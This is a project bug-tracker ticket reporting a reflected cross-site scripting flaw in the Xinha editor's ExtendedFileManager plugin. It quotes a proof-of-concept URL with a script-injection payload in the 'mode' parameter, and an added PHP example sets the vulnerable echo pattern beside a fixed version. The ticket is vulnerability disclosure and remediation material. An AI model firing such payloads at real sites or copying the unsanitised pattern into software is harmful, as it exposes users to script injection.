Ticket #1529 (new defect)

Opened 3 years ago

Last modified 3 years ago

Security Issues in XINHA WYSIWYG 0.96.1

Reported by: guest Owned by: gogo
Priority: normal Milestone: 0.97
Component: Xinha Core Version: trunk
Severity: normal Keywords: security issue
Cc: david.kurz@…

Description

Hello there,

we at MajorSecurity found some security related vulnerabilities within XINHA WYSIWYG Editor. Please tell me the email address I should send the security related details to.

You may contact me at: david.kurz[(at)]majorsecurity[(dot)]net

Best regards,

David Vieira-Kurz, Head of Security Research, MajorSecurity

Change History

follow-up: 2   Changed 3 years ago by ejucovy

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

in reply to: 1   Changed 3 years ago by gogo

Replying to ejucovy:

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

I emailed them when they posted, this is what they said...


Hello,

first of all, thanks for the fast answer.

We at MajorSecurity have discovered some vulnerabilities in one of the Plugins in XINHA WYSIWYG Editor version 0.96.1, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed directly to the "mode" parameter in "backend.php" of the "ExtendedFileManager" Plugin is not properly sanitised before being stored and returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Proof of Concept:

http://localhost/xinha-0.96.1/plugins/ExtendedFileManager/backend.php?__plugin=ExtendedFileManager&__function=manager&backend_data[data]=a%3A9%3A{s%3A17%3A%22max_foldersize_mb%22%3Bi%3A10%3Bs%3A9%3A%22files_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A10%3A%22images_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A9%3A%22files_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A10%3A%22images_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A21%3A%22images_enable_styling%22%3Bb%3A0%3Bs%3A21%3A%22max_filesize_kb_image%22%3Bi%3A200%3Bs%3A20%3A%22max_filesize_kb_link%22%3Bs%3A3%3A%22max%22%3Bs%3A23%3A%22allowed_link_extensions%22%3Ba%3A12%3A{i%3A0%3Bs%3A3%3A%22jpg%22%3Bi%3A1%3Bs%3A3%3A%22gif%22%3Bi%3A2%3Bs%3A2%3A%22js%22%3Bi%3A3%3Bs%3A3%3A%22pdf%22%3Bi%3A4%3Bs%3A3%3A%22zip%22%3Bi%3A5%3Bs%3A3%3A%22txt%22%3Bi%3A6%3Bs%3A3%3A%22psd%22%3Bi%3A7%3Bs%3A3%3A%22png%22%3Bi%3A8%3Bs%3A4%3A%22html%22%3Bi%3A9%3Bs%3A3%3A%22swf%22%3Bi%3A10%3Bs%3A3%3A%22xml%22%3Bi%3A11%3Bs%3A3%3A%22xls%22%3B}}&backend_data[session_name]=PHPSESSID&backend_data[key_location]=Xinha%3ABackendKey&backend_data[hash]=582686c520f11fc779ada11642d7e3b5711a3c37&PHPSESSID=599be382ae27a9a75cd2e7d039b2098a&mode="<script>alert(/XSS/)</script>

Solution: Web applications should never trust user-generated input and should therefore sanitise all input. Edit the source code to ensure that input is properly sanitised.


I don't remember if I did anything about it.
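The "mode" reflection described in the quoted report, shown as an added PHP example that is not Xinha's own backend.php: the echo-it-back pattern beside a hardened version that allowlists the mode name and encodes on output. The valid mode names ('image', 'link') and the hidden-input output context are assumptions, not taken from the Xinha source.

```php
<?php
// Added illustration of the reported issue; not code from Xinha's ExtendedFileManager.
// The set of valid modes and the hidden-input context below are assumptions.

// Vulnerable pattern: the request parameter is echoed straight back into markup,
// so a value containing a quote and a tag breaks out of the attribute.
function render_mode_vulnerable(array $request): string
{
    $mode = isset($request['mode']) ? $request['mode'] : 'image';
    return '<input type="hidden" name="mode" value="' . $mode . '">';
}

// Hardened pattern, step 1: "mode" is an enumeration, so accept only known names.
const ALLOWED_MODES = ['image', 'link'];   // assumed set of valid modes

function resolve_mode(array $request): string
{
    $mode = isset($request['mode']) ? (string) $request['mode'] : 'image';
    // Strict comparison: anything that is not a known mode falls back to the default.
    if (!in_array($mode, ALLOWED_MODES, true)) {
        return 'image';
    }
    return $mode;
}

// Hardened pattern, step 2: encode for the HTML attribute context anyway, so the
// output stays safe even if the allowlist is later widened or bypassed.
function render_mode_hardened(array $request): string
{
    $mode = resolve_mode($request);
    return '<input type="hidden" name="mode" value="'
        . htmlspecialchars($mode, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Constructed request carrying the same payload shape as the report's proof of concept.
$hostile = ['mode' => '"<script>alert(/XSS/)</script>'];

// The vulnerable renderer reproduces the markup unchanged; the hardened renderer
// rejects the value via the allowlist and would entity-encode it if it got through.
echo render_mode_vulnerable($hostile), PHP_EOL;
echo render_mode_hardened($hostile), PHP_EOL;
echo htmlspecialchars($hostile['mode'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), PHP_EOL;
```

Both fixes belong together: the allowlist closes the reported vector for "mode", and the output encoding covers any other parameter that is reflected into the file manager's HTML.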
